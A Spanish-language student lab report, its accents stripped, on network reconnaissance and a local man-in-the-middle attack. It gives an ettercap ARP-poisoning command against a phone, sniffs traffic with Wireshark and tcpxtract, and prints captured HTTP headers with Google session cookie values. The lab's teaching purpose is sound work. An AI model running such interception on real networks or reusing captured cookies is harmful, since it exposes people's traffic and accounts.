Prctica 1. Ataques
Conclusin
Podemos observar que a travs de una direccin IP se puede saber la localizacin desde
la que se esta accediendo a esa IP. A travs de los dominios podemos saber a quien
pertenece ese dominio: organizacin, contactos, localizacin, direccin, telfonos
Tambin hemos visto como direcciones web estn registradas a travs de otras
empresas. Sabiendo la IP se puede llegar a conocer quien esta detrs de esa IP siempre y
cuando sea publica. Y podemos ver que a travs del correo se puede saber cierta
informacin del usuario por los contactos que tenga a travs de sus correos.
De todo esto podemos deducir que todo lo que ocurre a travs de la red deja un rastro
que se puede seguir para obtener informacin.
Pasos practica:
ettercap -Tq -i interfaz -M arp:remote /Ipvictima/ /Iprouter/
siendo i interfaz nuestra interfaz de red : wlan0
IProuter la IP de nuestro router: 192.168.1.1
IPvictima la IP de la vctima: 192.168.1.6 (Mvil)
Con el wireshark esnifamos todo el trafico que se procesa y a travs del tcpxtract:
tcpxtract -f archivo_captura -o destino_resultado_captura podemos averiguar cierta
cantidad de datos como
/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
GET /images/logo_mobile_srp_3.png HTTP/1.1
Host: www.google.com
Connection: keep-alive
Accept-Encoding: gzip
Referer: http://www.google.com/m?hl=es&gl=es&client=ms-android-hms-tefes&source=android-browser-type&q=meristation
Accept-Language: es-ES, en-US
x-wap-profile: http://wap.samsungmobile.com/uaprof/GT-S5830.xml
User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.5; es-es; GT-S5830
Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0
Mobile Safari/533.1
Cookie: NID=67=T9tzGqvlIk4UjuvYfCkC_jaE6n4vDVL6yTEt0Pk32dggE9VOuNEoBKafFf737vaE_yAgCGSVEut7Z0SV1CKFLJWM4PVhBylpqpVbHD1U5vYoDi
qR92BDLNrSEHvLnpk;
PREF=ID=ff6bb9761b4ae7dc:FF=0:TM=1408566740:LM=1408566740:S=sDv4D4xlP
cxSe8Lv
Accept: text/xml, text/html, application/xhtml+xml, image/png, text/plain, */*;q=0.8
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
De todo esto podemos averiguar la marca del mvil y el tipo de mvil, en nuestro caso
un Samsung GT-S5830, la versin de Android Gingerbread y la versin del navegador
Safari.
Conclusin
Despus de realizar esta prctica nos hemos dado cuenta que al conectarnos a una red en
la que haya mas usuarios podemos ser victimas de ataques malintencionados. Por ello
hay que extremar la precaucin a la hora de introducir datos sensibles ya que nuestra
privacidad puede ser atacada.